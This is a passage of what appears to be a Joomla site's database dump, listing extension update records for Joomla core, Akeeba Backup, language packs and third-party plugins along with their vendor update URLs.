package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32800,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32801,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32802,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32803,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32804,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32805,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32806,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32807,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32808,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32809,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32810,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32811,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32812,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32813,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32814,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32815,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32816,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32817,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32818,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32819,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32820,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32821,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32822,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32823,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32824,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32825,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32826,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32827,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32828,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32829,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32830,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32831,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32832,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32833,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32834,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32835,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32836,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32837,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32838,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32839,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32840,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32841,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32842,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32843,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32844,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32845,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32846,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32847,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32848,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32849,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32850,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32851,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32852,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32853,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32854,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32855,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32856,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32857,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32858,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32859,3,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32860,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32861,3,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32862,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32863,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32864,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32865,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32866,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32867,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32868,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32869,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32870,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32871,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32872,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32873,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32874,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32875,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32876,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32877,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32878,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32879,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32880,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32881,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32882,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32883,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32884,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32885,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32886,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32887,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32888,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32889,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32890,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32891,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32892,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32893,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32894,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(32895,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(32896,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(32897,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(32898,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(32899,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(32900,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(32901,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(32902,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(32903,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(32904,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(32905,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(32906,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32907,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32908,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32909,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32910,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32911,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32912,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32913,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32914,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32915,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32916,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32917,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32918,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32919,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32920,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32921,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32922,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32923,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32924,57,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32925,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32926,57,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32927,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32928,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32929,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32930,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32931,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32932,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32933,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32934,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32935,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32936,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32937,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32938,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32939,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32940,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32941,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32942,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32943,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32944,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32945,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32946,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32947,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32948,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32949,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32950,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32951,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32952,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32953,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32954,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32955,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32956,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32957,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32958,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32959,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(32960,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.1.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-1-2			\n		',''),(32961,129,0,'JCE 2.9.28','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.28','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-28-released',''),(32962,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32963,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32964,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32965,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32966,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32967,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32968,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32969,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32970,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32971,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32972,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32973,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32974,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32975,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32976,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32977,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32978,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.0','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(32979,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32980,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32981,57,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32982,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32983,57,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32984,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32985,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32986,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32987,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32988,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32989,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32990,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32991,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32992,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32993,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32994,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32995,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32996,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32997,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32998,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32999,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33000,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33001,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33002,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33003,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33004,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33005,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33006,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33007,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33008,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33009,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33010,57,0,'Tamil, 